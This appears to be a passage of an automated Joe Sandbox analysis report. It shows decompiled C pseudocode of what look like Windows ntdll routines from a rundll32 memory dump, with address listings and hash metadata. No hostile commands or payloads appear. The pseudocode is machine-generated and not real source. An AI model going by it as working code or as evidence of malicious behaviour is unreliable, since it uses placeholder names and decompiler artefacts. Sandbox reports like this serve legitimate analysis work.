                                                                                            																						_t68 = _t177 + 0x20;
                                                                                            																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                                                                            																						__eflags =  *_t68;
                                                                                            																						_t91 =  *(_t177 + 0x20);
                                                                                            																						goto L74;
                                                                                            																					}
                                                                                            																				}
                                                                                            																			}
                                                                                            																			goto L35;
                                                                                            																		} else {
                                                                                            																			__eflags = _t141;
                                                                                            																			if(_t141 != 0) {
                                                                                            																				_t177 = E0460FD22(_t177);
                                                                                            																				__eflags = _t177;
                                                                                            																				if(_t177 == 0) {
                                                                                            																					L42:
                                                                                            																					_t77 = 0xc0000001;
                                                                                            																					goto L33;
                                                                                            																				} else {
                                                                                            																					_t130 = E0460FD9B(_t177, 0, 4);
                                                                                            																					__eflags = _t130;
                                                                                            																					if(_t130 != 0) {
                                                                                            																						goto L42;
                                                                                            																					} else {
                                                                                            																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                                                                            																						_t91 =  *(_t177 + 0x20);
                                                                                            																						goto L26;
                                                                                            																					}
                                                                                            																				}
                                                                                            																				goto L35;
                                                                                            																			} else {
                                                                                            																				L26:
                                                                                            																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                                                                            																				__eflags = _t94;
                                                                                            																				L27:
                                                                                            																				 *(_t177 + 0x20) = _t94;
                                                                                            																				__eflags = _t170 & 0x00008000;
                                                                                            																				if((_t170 & 0x00008000) != 0) {
                                                                                            																					_t95 = _a12;
                                                                                            																					__eflags = _t95;
                                                                                            																					if(_t95 != 0) {
                                                                                            																						_t96 =  *_t95;
                                                                                            																						__eflags = _t96;
                                                                                            																						if(_t96 != 0) {
                                                                                            																							 *((short*)(_t177 + 0x22)) = 0;
                                                                                            																							_t40 = _t177 + 0x20;
                                                                                            																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                                                                            																							__eflags =  *_t40;
                                                                                            																						}
                                                                                            																					}
                                                                                            																				}
                                                                                            																				goto L31;
                                                                                            																			}
                                                                                            																		}
                                                                                            																	}
                                                                                            																}
                                                                                            															}
                                                                                            														}
                                                                                            													} else {
                                                                                            														_t147 =  *( *[fs:0x18] + 0xfc0);
                                                                                            														_t106 =  *(_t147 + 0x20);
                                                                                            														__eflags = _t106 & 0x00000040;
                                                                                            														if((_t106 & 0x00000040) != 0) {
                                                                                            															_t147 = E0460FD22(_t147);
                                                                                            															__eflags = _t147;
                                                                                            															if(_t147 == 0) {
                                                                                            																L41:
                                                                                            																_t130 = 0xc0000001;
                                                                                            																L32:
                                                                                            																_t77 = _t130;
                                                                                            																goto L33;
                                                                                            															} else {
                                                                                            																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                                                                            																_t106 =  *(_t147 + 0x20);
                                                                                            																goto L17;
                                                                                            															}
                                                                                            															goto L35;
                                                                                            														} else {
                                                                                            															L17:
                                                                                            															_t108 = _t106 | 0x00000080;
                                                                                            															__eflags = _t108;
                                                                                            															 *(_t147 + 0x20) = _t108;
                                                                                            															 *( *[fs:0x18] + 0xfc0) = _t147;
                                                                                            															goto L18;
                                                                                            														}
                                                                                            													}
                                                                                            												}
                                                                                            											}
                                                                                            											L33:
                                                                                            										}
                                                                                            									}
                                                                                            								}
                                                                                            							}
                                                                                            						}
                                                                                            						L35:
                                                                                            						return _t77;
                                                                                            					} else {
                                                                                            						 *_t75 = 0x46c7b80;
                                                                                            						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                                                                            						 *_t134 = _t75;
                                                                                            						 *0x46c7b84 = _t75;
                                                                                            						_t73 = E045EEB70(_t134, 0x46c7b60);
                                                                                            						if( *0x46c7b20 != 0) {
                                                                                            							_t73 =  *( *[fs:0x30] + 0xc);
                                                                                            							if( *((char*)(_t73 + 0x28)) == 0) {
                                                                                            								_t73 = E045EFF60( *0x46c7b20);
                                                                                            							}
                                                                                            						}
                                                                                            						goto L5;
                                                                                            					}
                                                                                            				}
                                                                                            			}

















































                                                                                            0x0464be27
                                                                                            0x0464be35
                                                                                            0x0464be39
                                                                                            0x0464be46
                                                                                            0x0464be4f
                                                                                            0x0464be54
                                                                                            0x0464be56
                                                                                            0x0464bef8
                                                                                            0x0464bef8
                                                                                            0x00000000
                                                                                            0x0464be5c
                                                                                            0x0464be5c
                                                                                            0x0464be60
                                                                                            0x00000000
                                                                                            0x0464be66
                                                                                            0x0464be66
                                                                                            0x0464be7f
                                                                                            0x0464be84
                                                                                            0x0464be87
                                                                                            0x0464be89
                                                                                            0x0464be8b
                                                                                            0x0464be99
                                                                                            0x0464be9d
                                                                                            0x0464bea0
                                                                                            0x0464beac
                                                                                            0x0464beaf
                                                                                            0x0464beb1
                                                                                            0x0464beb3
                                                                                            0x0464beb3
                                                                                            0x00000000
                                                                                            0x0464bea2
                                                                                            0x0464bea2
                                                                                            0x00000000
                                                                                            0x0464bea2
                                                                                            0x0464be8d
                                                                                            0x0464be8d
                                                                                            0x0464be92
                                                                                            0x00000000
                                                                                            0x0464be92
                                                                                            0x0464be8b
                                                                                            0x0464be60
                                                                                            0x0464be3b
                                                                                            0x0464be3b
                                                                                            0x0464be3e
                                                                                            0x00000000
                                                                                            0x0464be40
                                                                                            0x0464be40
                                                                                            0x0464be44
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0464be44
                                                                                            0x0464be3e
                                                                                            0x0464be29
                                                                                            0x0464be29
                                                                                            0x00000000
                                                                                            0x0464be29
                                                                                            0x0464be27
                                                                                            0x00000000
                                                                                            0x0460fba7
                                                                                            0x0460fba7
                                                                                            0x0460fbab
                                                                                            0x0464bf02
                                                                                            0x0460fbb1
                                                                                            0x0460fbb1
                                                                                            0x0460fbb8
                                                                                            0x0460fbbd
                                                                                            0x0460fbbd
                                                                                            0x0460fbbf
                                                                                            0x0460fbbf
                                                                                            0x0460fbc5
                                                                                            0x0460fbcb
                                                                                            0x0460fbf8
                                                                                            0x0460fbf8
                                                                                            0x0460fbfa
                                                                                            0x00000000
                                                                                            0x0460fc00
                                                                                            0x0460fc00
                                                                                            0x0460fc03
                                                                                            0x00000000
                                                                                            0x0460fc09
                                                                                            0x0460fc09
                                                                                            0x0460fc0f
                                                                                            0x0460fc15
                                                                                            0x0460fc23
                                                                                            0x0460fc23
                                                                                            0x0460fc25
                                                                                            0x0460fc27
                                                                                            0x0460fc75
                                                                                            0x0460fc7c
                                                                                            0x0460fc84
                                                                                            0x00000000
                                                                                            0x0460fc29
                                                                                            0x0460fc29
                                                                                            0x0460fc2d
                                                                                            0x0460fc30
                                                                                            0x0464bf0f
                                                                                            0x00000000
                                                                                            0x0460fc36
                                                                                            0x0460fc38
                                                                                            0x0460fc3b
                                                                                            0x0460fc41
                                                                                            0x0464bf17
                                                                                            0x0464bf19
                                                                                            0x0464bf48
                                                                                            0x0464bf4b
                                                                                            0x00000000
                                                                                            0x0464bf1b
                                                                                            0x0464bf22
                                                                                            0x0464bf24
                                                                                            0x0464bf26
                                                                                            0x00000000
                                                                                            0x0464bf2c
                                                                                            0x0464bf37
                                                                                            0x0464bf39
                                                                                            0x0464bf3b
                                                                                            0x00000000
                                                                                            0x0464bf41
                                                                                            0x0464bf41
                                                                                            0x0464bf41
                                                                                            0x0464bf41
                                                                                            0x0464bf45
                                                                                            0x00000000
                                                                                            0x0464bf45
                                                                                            0x0464bf3b
                                                                                            0x0464bf26
                                                                                            0x00000000
                                                                                            0x0460fc47
                                                                                            0x0460fc47
                                                                                            0x0460fc49
                                                                                            0x0460fcb2
                                                                                            0x0460fcb4
                                                                                            0x0460fcb6
                                                                                            0x0460fcdc
                                                                                            0x0460fcdc
                                                                                            0x00000000
                                                                                            0x0460fcb8
                                                                                            0x0460fcc3
                                                                                            0x0460fcc5
                                                                                            0x0460fcc7
                                                                                            0x00000000
                                                                                            0x0460fcc9
                                                                                            0x0460fcc9
                                                                                            0x0460fccd
                                                                                            0x00000000
                                                                                            0x0460fccd
                                                                                            0x0460fcc7
                                                                                            0x00000000
                                                                                            0x0460fc4b
                                                                                            0x0460fc4b
                                                                                            0x0460fc4e
                                                                                            0x0460fc4e
                                                                                            0x0460fc51
                                                                                            0x0460fc51
                                                                                            0x0460fc54
                                                                                            0x0460fc5a
                                                                                            0x0460fc5c
                                                                                            0x0460fc5f
                                                                                            0x0460fc61
                                                                                            0x0460fc63
                                                                                            0x0460fc65
                                                                                            0x0460fc67
                                                                                            0x0460fc6e
                                                                                            0x0460fc72
                                                                                            0x0460fc72
                                                                                            0x0460fc72
                                                                                            0x0460fc72
                                                                                            0x0460fc67
                                                                                            0x0460fc61
                                                                                            0x00000000
                                                                                            0x0460fc5a
                                                                                            0x0460fc49
                                                                                            0x0460fc41
                                                                                            0x0460fc30
                                                                                            0x0460fc27
                                                                                            0x0460fc03
                                                                                            0x0460fbcd
                                                                                            0x0460fbd3
                                                                                            0x0460fbd9
                                                                                            0x0460fbdc
                                                                                            0x0460fbde
                                                                                            0x0460fc99
                                                                                            0x0460fc9b
                                                                                            0x0460fc9d
                                                                                            0x0460fcd5
                                                                                            0x0460fcd5
                                                                                            0x0460fc89
                                                                                            0x0460fc89
                                                                                            0x00000000
                                                                                            0x0460fc9f
                                                                                            0x0460fc9f
                                                                                            0x0460fca3
                                                                                            0x00000000
                                                                                            0x0460fca3
                                                                                            0x00000000
                                                                                            0x0460fbe4
                                                                                            0x0460fbe4
                                                                                            0x0460fbe4
                                                                                            0x0460fbe4
                                                                                            0x0460fbe9
                                                                                            0x0460fbf2
                                                                                            0x00000000
                                                                                            0x0460fbf2
                                                                                            0x0460fbde
                                                                                            0x0460fbcb
                                                                                            0x0460fbab
                                                                                            0x0460fc8b
                                                                                            0x0460fc8b
                                                                                            0x0460fc8c
                                                                                            0x0460fb80
                                                                                            0x0460fb72
                                                                                            0x0460fb5e
                                                                                            0x0460fc8d
                                                                                            0x0460fc91
                                                                                            0x0460fadf
                                                                                            0x0460fadf
                                                                                            0x0460fae1
                                                                                            0x0460fae4
                                                                                            0x0460fae7
                                                                                            0x0460faec
                                                                                            0x0460faf8
                                                                                            0x0460fb00
                                                                                            0x0460fb07
                                                                                            0x0460fb0f
                                                                                            0x0460fb0f
                                                                                            0x0460fb07
                                                                                            0x00000000
                                                                                            0x0460faf8
                                                                                            0x0460fadd

                                                                                            Strings
                                                                                            • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0464BE0F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                                            • API String ID: 0-865735534
                                                                                            • Opcode ID: 49e82942d3357ed858beb05b9b878562fd80ab5fd8636a98a546269b2f43553a
                                                                                            • Instruction ID: de407975995ed1dc67c1f862fca8cc3cc49b91cebd637443fd204a8b8d837b0f
                                                                                            • Opcode Fuzzy Hash: 49e82942d3357ed858beb05b9b878562fd80ab5fd8636a98a546269b2f43553a
                                                                                            • Instruction Fuzzy Hash: 9DA1C171B006068BEB3DDF65C45177BB3A5AB98B14F04856AD8069B7C0FBB4F942CB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 63%
                                                                                            			E045D2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                                                                            				signed char _v8;
                                                                                            				signed int _v12;
                                                                                            				signed int _v16;
                                                                                            				signed int _v20;
                                                                                            				signed int _v24;
                                                                                            				intOrPtr _v28;
                                                                                            				intOrPtr _v32;
                                                                                            				signed int _v52;
                                                                                            				void* __esi;
                                                                                            				void* __ebp;
                                                                                            				intOrPtr _t55;
                                                                                            				signed int _t57;
                                                                                            				signed int _t58;
                                                                                            				char* _t62;
                                                                                            				signed char* _t63;
                                                                                            				signed char* _t64;
                                                                                            				signed int _t67;
                                                                                            				signed int _t72;
                                                                                            				signed int _t77;
                                                                                            				signed int _t78;
                                                                                            				signed int _t88;
                                                                                            				intOrPtr _t89;
                                                                                            				signed char _t93;
                                                                                            				signed int _t97;
                                                                                            				signed int _t98;
                                                                                            				signed int _t102;
                                                                                            				signed int _t103;
                                                                                            				intOrPtr _t104;
                                                                                            				signed int _t105;
                                                                                            				signed int _t106;
                                                                                            				signed char _t109;
                                                                                            				signed int _t111;
                                                                                            				void* _t116;
                                                                                            
                                                                                            				_t102 = __edi;
                                                                                            				_t97 = __edx;
                                                                                            				_v12 = _v12 & 0x00000000;
                                                                                            				_t55 =  *[fs:0x18];
                                                                                            				_t109 = __ecx;
                                                                                            				_v8 = __edx;
                                                                                            				_t86 = 0;
                                                                                            				_v32 = _t55;
                                                                                            				_v24 = 0;
                                                                                            				_push(__edi);
                                                                                            				if(__ecx == 0x46c5350) {
                                                                                            					_t86 = 1;
                                                                                            					_v24 = 1;
                                                                                            					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                                                                            				}
                                                                                            				_t103 = _t102 | 0xffffffff;
                                                                                            				if( *0x46c7bc8 != 0) {
                                                                                            					_push(0xc000004b);
                                                                                            					_push(_t103);
                                                                                            					E046197C0();
                                                                                            				}
                                                                                            				if( *0x46c79c4 != 0) {
                                                                                            					_t57 = 0;
                                                                                            				} else {
                                                                                            					_t57 = 0x46c79c8;
                                                                                            				}
                                                                                            				_v16 = _t57;
                                                                                            				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                                                                            					_t93 = _t109;
                                                                                            					L23();
                                                                                            				}
                                                                                            				_t58 =  *_t109;
                                                                                            				if(_t58 == _t103) {
                                                                                            					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                                                                            					_t58 = _t103;
                                                                                            					if(__eflags == 0) {
                                                                                            						_t93 = _t109;
                                                                                            						E04601624(_t86, __eflags);
                                                                                            						_t58 =  *_t109;
                                                                                            					}
                                                                                            				}
                                                                                            				_v20 = _v20 & 0x00000000;
                                                                                            				if(_t58 != _t103) {
                                                                                            					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                                                                            				}
                                                                                            				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                                                                            				_t88 = _v16;
                                                                                            				_v28 = _t104;
                                                                                            				L9:
                                                                                            				while(1) {
                                                                                            					if(E045F7D50() != 0) {
                                                                                            						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                                                                            					} else {
                                                                                            						_t62 = 0x7ffe0382;
                                                                                            					}
                                                                                            					if( *_t62 != 0) {
                                                                                            						_t63 =  *[fs:0x30];
                                                                                            						__eflags = _t63[0x240] & 0x00000002;
                                                                                            						if((_t63[0x240] & 0x00000002) != 0) {
                                                                                            							_t93 = _t109;
                                                                                            							E0466FE87(_t93);
                                                                                            						}
                                                                                            					}
                                                                                            					if(_t104 != 0xffffffff) {
                                                                                            						_push(_t88);
                                                                                            						_push(0);
                                                                                            						_push(_t104);
                                                                                            						_t64 = E04619520();
                                                                                            						goto L15;
                                                                                            					} else {
                                                                                            						while(1) {
                                                                                            							_t97 =  &_v8;
                                                                                            							_t64 = E0460E18B(_t109 + 4, _t97, 4, _t88, 0);
                                                                                            							if(_t64 == 0x102) {
                                                                                            								break;
                                                                                            							}
                                                                                            							_t93 =  *(_t109 + 4);
                                                                                            							_v8 = _t93;
                                                                                            							if((_t93 & 0x00000002) != 0) {
                                                                                            								continue;
                                                                                            							}
                                                                                            							L15:
                                                                                            							if(_t64 == 0x102) {
                                                                                            								break;
                                                                                            							}
                                                                                            							_t89 = _v24;
                                                                                            							if(_t64 < 0) {
                                                                                            								L0462DF30(_t93, _t97, _t64);
                                                                                            								_push(_t93);
                                                                                            								_t98 = _t97 | 0xffffffff;
                                                                                            								__eflags =  *0x46c6901;
                                                                                            								_push(_t109);
                                                                                            								_v52 = _t98;
                                                                                            								if( *0x46c6901 != 0) {
                                                                                            									_push(0);
                                                                                            									_push(1);
                                                                                            									_push(0);
                                                                                            									_push(0x100003);
                                                                                            									_push( &_v12);
                                                                                            									_t72 = E04619980();
                                                                                            									__eflags = _t72;
                                                                                            									if(_t72 < 0) {
                                                                                            										_v12 = _t98 | 0xffffffff;
                                                                                            									}
                                                                                            								}
                                                                                            								asm("lock cmpxchg [ecx], edx");
                                                                                            								_t111 = 0;
                                                                                            								__eflags = 0;
                                                                                            								if(0 != 0) {
                                                                                            									__eflags = _v12 - 0xffffffff;
                                                                                            									if(_v12 != 0xffffffff) {
                                                                                            										_push(_v12);
                                                                                            										E046195D0();
                                                                                            									}
                                                                                            								} else {
                                                                                            									_t111 = _v12;
                                                                                            								}
                                                                                            								return _t111;
                                                                                            							} else {
                                                                                            								if(_t89 != 0) {
                                                                                            									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                                                                            									_t77 = E045F7D50();
                                                                                            									__eflags = _t77;
                                                                                            									if(_t77 == 0) {
                                                                                            										_t64 = 0x7ffe0384;
                                                                                            									} else {
                                                                                            										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                                            									}
                                                                                            									__eflags =  *_t64;
                                                                                            									if( *_t64 != 0) {
                                                                                            										_t64 =  *[fs:0x30];
                                                                                            										__eflags = _t64[0x240] & 0x00000004;
                                                                                            										if((_t64[0x240] & 0x00000004) != 0) {
                                                                                            											_t78 = E045F7D50();
                                                                                            											__eflags = _t78;
                                                                                            											if(_t78 == 0) {
                                                                                            												_t64 = 0x7ffe0385;
                                                                                            											} else {
                                                                                            												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                                            											}
                                                                                            											__eflags =  *_t64 & 0x00000020;
                                                                                            											if(( *_t64 & 0x00000020) != 0) {
                                                                                            												_t64 = E04657016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                                                                            											}
                                                                                            										}
                                                                                            									}
                                                                                            								}
                                                                                            								return _t64;
                                                                                            							}
                                                                                            						}
                                                                                            						_t97 = _t88;
                                                                                            						_t93 = _t109;
                                                                                            						E0466FDDA(_t97, _v12);
                                                                                            						_t105 =  *_t109;
                                                                                            						_t67 = _v12 + 1;
                                                                                            						_v12 = _t67;
                                                                                            						__eflags = _t105 - 0xffffffff;
                                                                                            						if(_t105 == 0xffffffff) {
                                                                                            							_t106 = 0;
                                                                                            							__eflags = 0;
                                                                                            						} else {
                                                                                            							_t106 =  *(_t105 + 0x14);
                                                                                            						}
                                                                                            						__eflags = _t67 - 2;
                                                                                            						if(_t67 > 2) {
                                                                                            							__eflags = _t109 - 0x46c5350;
                                                                                            							if(_t109 != 0x46c5350) {
                                                                                            								__eflags = _t106 - _v20;
                                                                                            								if(__eflags == 0) {
                                                                                            									_t93 = _t109;
                                                                                            									E0466FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                                                                            								}
                                                                                            							}
                                                                                            						}
                                                                                            						_push("RTL: Re-Waiting\n");
                                                                                            						_push(0);
                                                                                            						_push(0x65);
                                                                                            						_v20 = _t106;
                                                                                            						E04665720();
                                                                                            						_t104 = _v28;
                                                                                            						_t116 = _t116 + 0xc;
                                                                                            						continue;
                                                                                            					}
                                                                                            				}
                                                                                            			}




































                                                                                            0x045d2ed7
                                                                                            0x045d2e61
                                                                                            0x045d2e63
                                                                                            0x0462fa6b
                                                                                            0x0462fa71
                                                                                            0x0462fa76
                                                                                            0x0462fa78
                                                                                            0x0462fa8a
                                                                                            0x0462fa7a
                                                                                            0x0462fa83
                                                                                            0x0462fa83
                                                                                            0x0462fa8f
                                                                                            0x0462fa91
                                                                                            0x0462fa97
                                                                                            0x0462fa9d
                                                                                            0x0462faa4
                                                                                            0x0462faaa
                                                                                            0x0462faaf
                                                                                            0x0462fab1
                                                                                            0x0462fac3
                                                                                            0x0462fab3
                                                                                            0x0462fabc
                                                                                            0x0462fabc
                                                                                            0x0462fac8
                                                                                            0x0462facb
                                                                                            0x0462fadf
                                                                                            0x0462fadf
                                                                                            0x0462facb
                                                                                            0x0462faa4
                                                                                            0x0462fa91
                                                                                            0x045d2e6f
                                                                                            0x045d2e6f
                                                                                            0x045d2e5f
                                                                                            0x0462fa13
                                                                                            0x0462fa15
                                                                                            0x0462fa17
                                                                                            0x0462fa1f
                                                                                            0x0462fa21
                                                                                            0x0462fa22
                                                                                            0x0462fa25
                                                                                            0x0462fa28
                                                                                            0x0462fa2f
                                                                                            0x0462fa2f
                                                                                            0x0462fa2a
                                                                                            0x0462fa2a
                                                                                            0x0462fa2a
                                                                                            0x0462fa31
                                                                                            0x0462fa34
                                                                                            0x0462fa36
                                                                                            0x0462fa3c
                                                                                            0x0462fa3e
                                                                                            0x0462fa41
                                                                                            0x0462fa43
                                                                                            0x0462fa45
                                                                                            0x0462fa45
                                                                                            0x0462fa41
                                                                                            0x0462fa3c
                                                                                            0x0462fa4a
                                                                                            0x0462fa4f
                                                                                            0x0462fa51
                                                                                            0x0462fa53
                                                                                            0x0462fa56
                                                                                            0x0462fa5b
                                                                                            0x0462fa5e
                                                                                            0x00000000
                                                                                            0x0462fa5e
                                                                                            0x045d2e23

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: RTL: Re-Waiting
                                                                                            • API String ID: 0-316354757
                                                                                            • Opcode ID: 11d05f4426b2b7e2980899771ea2b7fa28417af92b13aa533e68ba955cf56cdc
                                                                                            • Instruction ID: b234e11141278ffa209166fceb078ed2fc436b7b9a29cf5502adf03110b44a2a
                                                                                            • Opcode Fuzzy Hash: 11d05f4426b2b7e2980899771ea2b7fa28417af92b13aa533e68ba955cf56cdc
                                                                                            • Instruction Fuzzy Hash: 4E61F030A00A55FBEB35DF68D940B7AB7B5FF44718F1446AAE812973C0E734B901AB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 80%
                                                                                            			E046A0EA5(void* __ecx, void* __edx) {
                                                                                            				signed int _v20;
                                                                                            				char _v24;
                                                                                            				intOrPtr _v28;
                                                                                            				unsigned int _v32;
                                                                                            				signed int _v36;
                                                                                            				intOrPtr _v40;
                                                                                            				char _v44;
                                                                                            				intOrPtr _v64;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				signed int _t58;
                                                                                            				unsigned int _t60;
                                                                                            				intOrPtr _t62;
                                                                                            				char* _t67;
                                                                                            				char* _t69;
                                                                                            				void* _t80;
                                                                                            				void* _t83;
                                                                                            				intOrPtr _t93;
                                                                                            				intOrPtr _t115;
                                                                                            				char _t117;
                                                                                            				void* _t120;
                                                                                            
                                                                                            				_t83 = __edx;
                                                                                            				_t117 = 0;
                                                                                            				_t120 = __ecx;
                                                                                            				_v44 = 0;
                                                                                            				if(E0469FF69(__ecx,  &_v44,  &_v32) < 0) {
                                                                                            					L24:
                                                                                            					_t109 = _v44;
                                                                                            					if(_v44 != 0) {
                                                                                            						E046A1074(_t83, _t120, _t109, _t117, _t117);
                                                                                            					}
                                                                                            					L26:
                                                                                            					return _t117;
                                                                                            				}
                                                                                            				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                                                                            				_t5 = _t83 + 1; // 0x1
                                                                                            				_v36 = _t5 << 0xc;
                                                                                            				_v40 = _t93;
                                                                                            				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                                                                            				asm("sbb ebx, ebx");
                                                                                            				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                                                                            				if(_t58 != 0) {
                                                                                            					_push(0);
                                                                                            					_push(0x14);
                                                                                            					_push( &_v24);
                                                                                            					_push(3);
                                                                                            					_push(_t93);
                                                                                            					_push(0xffffffff);
                                                                                            					_t80 = E04619730();
                                                                                            					_t115 = _v64;
                                                                                            					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                                                                            						_push(_t93);
                                                                                            						E0469A80D(_t115, 1, _v20, _t117);
                                                                                            						_t83 = 4;
                                                                                            					}
                                                                                            				}
                                                                                            				if(E0469A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                                                                            					goto L24;
                                                                                            				}
                                                                                            				_t60 = _v32;
                                                                                            				_t97 = (_t60 != 0x100000) + 1;
                                                                                            				_t83 = (_v44 -  *0x46c8b04 >> 0x14) + (_v44 -  *0x46c8b04 >> 0x14);
                                                                                            				_v28 = (_t60 != 0x100000) + 1;
                                                                                            				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                                                                            				_v40 = _t62;
                                                                                            				if(_t83 >= _t62) {
                                                                                            					L10:
                                                                                            					asm("lock xadd [eax], ecx");
                                                                                            					asm("lock xadd [eax], ecx");
                                                                                            					if(E045F7D50() == 0) {
                                                                                            						_t67 = 0x7ffe0380;
                                                                                            					} else {
                                                                                            						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                            					}
                                                                                            					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                            						E0469138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                                                                            					}
                                                                                            					if(E045F7D50() == 0) {
                                                                                            						_t69 = 0x7ffe0388;
                                                                                            					} else {
                                                                                            						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                            					}
                                                                                            					if( *_t69 != 0) {
                                                                                            						E0468FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                                                                            					}
                                                                                            					if(( *0x46c8724 & 0x00000008) != 0) {
                                                                                            						E046952F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                                                                            					}
                                                                                            					_t117 = _v44;
                                                                                            					goto L26;
                                                                                            				}
                                                                                            				while(E046A15B5(0x46c8ae4, _t83, _t97, _t97) >= 0) {
                                                                                            					_t97 = _v28;
                                                                                            					_t83 = _t83 + 2;
                                                                                            					if(_t83 < _v40) {
                                                                                            						continue;
                                                                                            					}
                                                                                            					goto L10;
                                                                                            				}
                                                                                            				goto L24;
                                                                                            			}

























                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: `
                                                                                            • API String ID: 0-2679148245
                                                                                            • Opcode ID: ffa7dea3a43594b7ee440e18f8b2ec68dcba684b217cf60ced8de7215b21983d
                                                                                            • Instruction ID: a76f4d6cab68fbd8c4558e40d5336fcf20090e9910ac6f464d604f51e42d712d
                                                                                            • Opcode Fuzzy Hash: ffa7dea3a43594b7ee440e18f8b2ec68dcba684b217cf60ced8de7215b21983d
                                                                                            • Instruction Fuzzy Hash: 6651DF702047829FE724DF28D984B6BB7E9EBC5314F04492CF99697290EA70FC15CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 76%
                                                                                            			E0460F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                                                                            				intOrPtr _v8;
                                                                                            				intOrPtr _v12;
                                                                                            				intOrPtr _v16;
                                                                                            				char* _v20;
                                                                                            				intOrPtr _v24;
                                                                                            				char _v28;
                                                                                            				intOrPtr _v32;
                                                                                            				char _v36;
                                                                                            				char _v44;
                                                                                            				char _v52;
                                                                                            				intOrPtr _v56;
                                                                                            				char _v60;
                                                                                            				intOrPtr _v72;
                                                                                            				void* _t51;
                                                                                            				void* _t58;
                                                                                            				signed short _t82;
                                                                                            				short _t84;
                                                                                            				signed int _t91;
                                                                                            				signed int _t100;
                                                                                            				signed short* _t103;
                                                                                            				void* _t108;
                                                                                            				intOrPtr* _t109;
                                                                                            
                                                                                            				_t103 = __ecx;
                                                                                            				_t82 = __edx;
                                                                                            				_t51 = E045F4120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                                                                            				if(_t51 >= 0) {
                                                                                            					_push(0x21);
                                                                                            					_push(3);
                                                                                            					_v56 =  *0x7ffe02dc;
                                                                                            					_v20 =  &_v52;
                                                                                            					_push( &_v44);
                                                                                            					_v28 = 0x18;
                                                                                            					_push( &_v28);
                                                                                            					_push(0x100020);
                                                                                            					_v24 = 0;
                                                                                            					_push( &_v60);
                                                                                            					_v16 = 0x40;
                                                                                            					_v12 = 0;
